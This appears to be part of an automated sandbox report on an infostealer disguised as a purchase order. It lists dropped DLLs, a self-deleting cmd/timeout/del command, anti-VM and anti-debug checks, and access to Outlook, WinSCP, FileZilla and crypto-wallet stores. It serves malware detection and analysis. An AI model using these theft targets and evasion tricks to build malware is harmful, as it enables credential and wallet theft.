                    Source: api-ms-win-core-console-l1-1-0.dll.5.drStatic PE information: 0xAC22BA81 [Thu Jul 7 10:18:41 2061 UTC]
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeFile created: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeFile created: C:\Users\user\AppData\Local\Temp\94EA6FBC\nssdbm3.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeFile created: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeFile created: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeFile created: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeFile created: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeFile created: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-file-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeFile created: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-util-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeFile created: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeFile created: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeFile created: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeFile created: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeFile created: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeFile created: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeFile created: C:\Users\user\AppData\Local\Temp\94EA6FBC\softokn3.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeFile created: C:\Users\user\AppData\Local\Temp\94EA6FBC\ucrtbase.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeFile created: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeFile created: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeFile created: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeFile created: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeFile created: C:\Users\user\AppData\Local\Temp\94EA6FBC\mozglue.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeFile created: C:\Users\user\AppData\Local\Temp\94EA6FBC\vcruntime140.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeFile created: C:\Users\user\AppData\Local\Temp\nsh409.tmp\System.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeFile created: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeFile created: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeFile created: C:\Users\user\Overfurnished\Tuberculisation\Woodwose\Circularizations126\Iltningernes\Mellivorous\qipcap.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeFile created: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeFile created: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeFile created: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeFile created: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeFile created: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-file-l2-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeFile created: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeFile created: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeFile created: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-console-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeFile created: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeFile created: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeFile created: C:\Users\user\AppData\Local\Temp\94EA6FBC\nss3.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeFile created: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeFile created: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-string-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeFile created: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeFile created: C:\Users\user\Overfurnished\Tuberculisation\Woodwose\Circularizations126\Iltningernes\Mellivorous\WMIMethod.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeFile created: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeFile created: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-multibyte-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeFile created: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeFile created: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-private-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeFile created: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeFile created: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeFile created: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeFile created: C:\Users\user\AppData\Local\Temp\94EA6FBC\msvcp140.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeFile created: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-file-l1-2-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeFile created: C:\Users\user\AppData\Local\Temp\94EA6FBC\freebl3.dllJump to dropped file

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeProcess created: C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "PO No. 3200005919.exe
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeProcess created: C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "PO No. 3200005919.exeJump to behavior
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\94EA6FBC\nssdbm3.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeDropped PE file which has not been started: C:\Users\user\Overfurnished\Tuberculisation\Woodwose\Circularizations126\Iltningernes\Mellivorous\qipcap.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-file-l2-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-file-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-console-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-util-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-string-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeDropped PE file which has not been started: C:\Users\user\Overfurnished\Tuberculisation\Woodwose\Circularizations126\Iltningernes\Mellivorous\WMIMethod.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-multibyte-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\94EA6FBC\softokn3.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-private-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-file-l1-2-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\94EA6FBC\freebl3.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_0412040B rdtsc 1_2_0412040B
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_00402862 FindFirstFileW,1_2_00402862
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_004066F3 FindFirstFileW,FindClose,1_2_004066F3
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_00405ABE CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,1_2_00405ABE
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeSystem information queried: ModuleInformationJump to behavior
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeAPI call chain: ExitProcess graph end nodegraph_1-11345
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeAPI call chain: ExitProcess graph end nodegraph_1-11189
                    Source: PO No. 3200005919.exe, 00000001.00000002.7117283441.0000000010059000.00000004.00000800.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7240956603.0000000003469000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
                    Source: PO No. 3200005919.exe, 00000001.00000002.7117283441.0000000010059000.00000004.00000800.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7240956603.0000000003469000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
                    Source: PO No. 3200005919.exe, 00000005.00000002.7240956603.0000000003469000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicshutdown
                    Source: PO No. 3200005919.exe, 00000001.00000002.7117283441.0000000010059000.00000004.00000800.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7240956603.0000000003469000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
                    Source: PO No. 3200005919.exe, 00000001.00000002.7117283441.0000000010059000.00000004.00000800.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7240956603.0000000003469000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
                    Source: PO No. 3200005919.exe, 00000001.00000002.7117283441.0000000010059000.00000004.00000800.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7240956603.0000000003469000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Time Synchronization Service
                    Source: PO No. 3200005919.exe, 00000005.00000002.7240956603.0000000003469000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicvss
                    Source: PO No. 3200005919.exe, 00000005.00000002.7238680594.0000000001796000.00000004.00000020.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7239278080.00000000017E5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: PO No. 3200005919.exe, 00000001.00000002.7117283441.0000000010059000.00000004.00000800.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7240956603.0000000003469000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Data Exchange Service
                    Source: PO No. 3200005919.exe, 00000001.00000002.7117283441.0000000010059000.00000004.00000800.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7240956603.0000000003469000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Heartbeat Service
                    Source: PO No. 3200005919.exe, 00000001.00000002.7117283441.0000000010059000.00000004.00000800.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7240956603.0000000003469000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Service Interface
                    Source: PO No. 3200005919.exe, 00000005.00000002.7240956603.0000000003469000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicheartbeat
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_0412040B rdtsc 1_2_0412040B
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_0412C48A mov eax, dword ptr fs:[00000030h]1_2_0412C48A
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_04140F30 mov eax, dword ptr fs:[00000030h]1_2_04140F30
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_041432EB mov eax, dword ptr fs:[00000030h]1_2_041432EB
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_04140F4D LdrLoadDll,1_2_04140F4D
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeProcess created: C:\Users\user\Desktop\PO No. 3200005919.exe C:\Users\user\Desktop\PO No. 3200005919.exeJump to behavior
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "PO No. 3200005919.exeJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe C:\Windows\system32\timeout.exe 3 Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_00403489 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,1_2_00403489

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: 5.2.PO No. 3200005919.exe.1de7883c.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.PO No. 3200005919.exe.1de22afc.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.PO No. 3200005919.exe.1de27450.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000005.00000002.7268634345.000000001D92C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.7267996696.000000001D8D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.7257083339.000000001D3C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: PO No. 3200005919.exe PID: 5920, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeFile opened: C:\Users\user\AppData\Roaming\Jaxx\Local Storage\Jump to behavior
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions\Jump to behavior
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeFile opened: C:\Users\user\AppData\Roaming\filezilla\recentservers.xmlJump to behavior
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeKey opened: HKEY_CURRENT_USER\Software\monero-project\monero-coreJump to behavior
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeKey opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-QtJump to behavior
                    Source: PO No. 3200005919.exe, 00000005.00000002.7267996696.000000001D8D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: %appdata%\Electrum\wallets\
